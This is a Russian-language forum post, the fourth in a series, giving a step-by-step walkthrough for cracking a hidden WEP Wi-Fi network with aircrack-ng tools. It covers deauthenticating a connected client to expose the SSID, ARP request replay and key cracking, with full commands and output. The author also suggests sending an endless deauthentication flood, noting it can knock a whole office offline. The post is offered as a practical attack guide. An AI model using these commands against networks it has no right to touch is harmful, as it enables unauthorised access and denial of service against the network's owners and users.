Показать сообщение отдельно
Старый 03.02.2012, 20:20    Топик Стартер ТС   #4 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию Взлом Wi-Fi сети (WEP) – часть 4

Всем привет!

Сегодня покажу вам, как взламывать скрытую wi-fi сеть. Как всегда, ничего сложного в этом нет. Скрытые wi-fi сети, фильтрация по MAC-адресам все это не спасет вас. На мой взгляд, такие методы защиты не эффективны, но это не значит, что ими нужно пренебрегать!

Все что нужно для получения SSID точки доступа, так это клиент подключенный к ней.

Смотрим список wi-fi сетей в радиусе действия.

Код:
# airodump-ng mon0

Click the image to open in full size.

Красным цветом подчеркнута наша точка доступа (AP), SSID которой скрыт от посторонних. Настраиваемся на нее.

Код:
# airodump-ng -c 1 -w wep_hidden --bssid 00:22:B0:BE:75:3D mon0
  • -c – номер канала
  • -w – название дамп-файла
  • –bssid – MAC-адрес точки доступа

Теперь делаем деаутентификацию клиента. После чего, если взглянуть в окно консоли где работает airodump-ng, то увидим название нашей wi-fi сети.

Для справки: если взломать точку доступа (AP) не получается, с некоторыми AP такое бывает, но черное дело сделать надо. Тогда вместо значения 1 подставляем значение, например 999999. После чего клиент не сможет подключиться к AP, но только до тех пор, пока будет работать эта команда. Следовательно, так можно нарушить работу целого офиса и т.п..

Код:
# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0
  • -0 – деаутентификация
  • 1 – количество пакетов
  • -a – MAC-адрес точки доступа
  • -c – MAC-адрес клиента, к которому применяется деаутентификация

Код:
14:02:32  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1
14:02:33  Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [26|26 ACKs]
Деаутентификация прошла успешно. Теперь посмотрим, на работу airodump-ng, как видим wi-fi сеть теперь не скрыта.

Click the image to open in full size.

Дальше применим вот такой тип атаки.

Код:
# aireplay-ng -3 -b 00:22:B0:BE:75:3D -h 70:F1:A1:72:B4:25 mon0
  • -3 – arp request replay
  • -b – MAC-адрес точки доступа
  • -h – MAC-адрес клиента

Код:
The interface MAC (00:C0:CA:30:85:7A) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 70:F1:A1:72:B4:25
14:04:26  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1
Saving ARP requests in replay_arp-1223-140426.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
287654 packets (got 50202 ARP requests and 85270 ACKs), sent 146528 packets...(500 pps)
Опять делаем деаутентификацию клиента. После чего полетят Data-пакеты.

Код:
# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0

14:02:32  Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1
14:02:33  Sending 64 directed DeAuth. STMAC: [70:F1:A1:72:B4:25] [26|26 ACKs]
Когда Data-пакетов накопилось достаточно, можем их расшифровывать.

Код:
# aircrack-ng -a 1 -0 wep_hidden.cap
  • -a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
  • 1 – WEP
  • -0 – использовать цвет

Click the image to open in full size.

На сегодня все. Если возникнут вопросы, обращайтесь.

Дополнительные материалы:
levinkv вне форума   Ответить с цитированием
Эти 2 пользователя(ей) сказали Спасибо levinkv за это полезное сообщение:
evgen (15.06.2013), lemurean (05.12.2014)
 
Время генерации страницы 0.08060 секунды с 14 запросами